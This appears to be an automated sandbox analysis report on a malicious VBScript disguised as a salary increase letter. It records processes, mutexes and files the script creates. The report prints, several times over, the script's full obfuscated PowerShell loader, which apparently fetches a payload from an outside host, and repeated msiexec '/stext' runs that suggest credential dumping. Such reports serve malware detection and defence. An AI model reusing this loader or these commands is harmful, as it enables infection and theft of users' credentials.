Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;HalvraaddeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7BFE4C0228_2_00007FF7BFE4C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7BFE4B2768_2_00007FF7BFE4B276
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_029BF36010_2_029BF360
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_029BFC3010_2_029BFC30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_029BE0C710_2_029BE0C7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_029BF01810_2_029BF018
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0708CDE010_2_0708CDE0
              Source: Salary Increase Letter_Oct 2024.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5132
              Source: unknownProcess created: Commandline size = 5132
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5132Jump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@6100/10@2/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Foregrib.sesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1ours4x.ine.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5936
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6368
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraadde
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraadde
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;HalvraaddeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
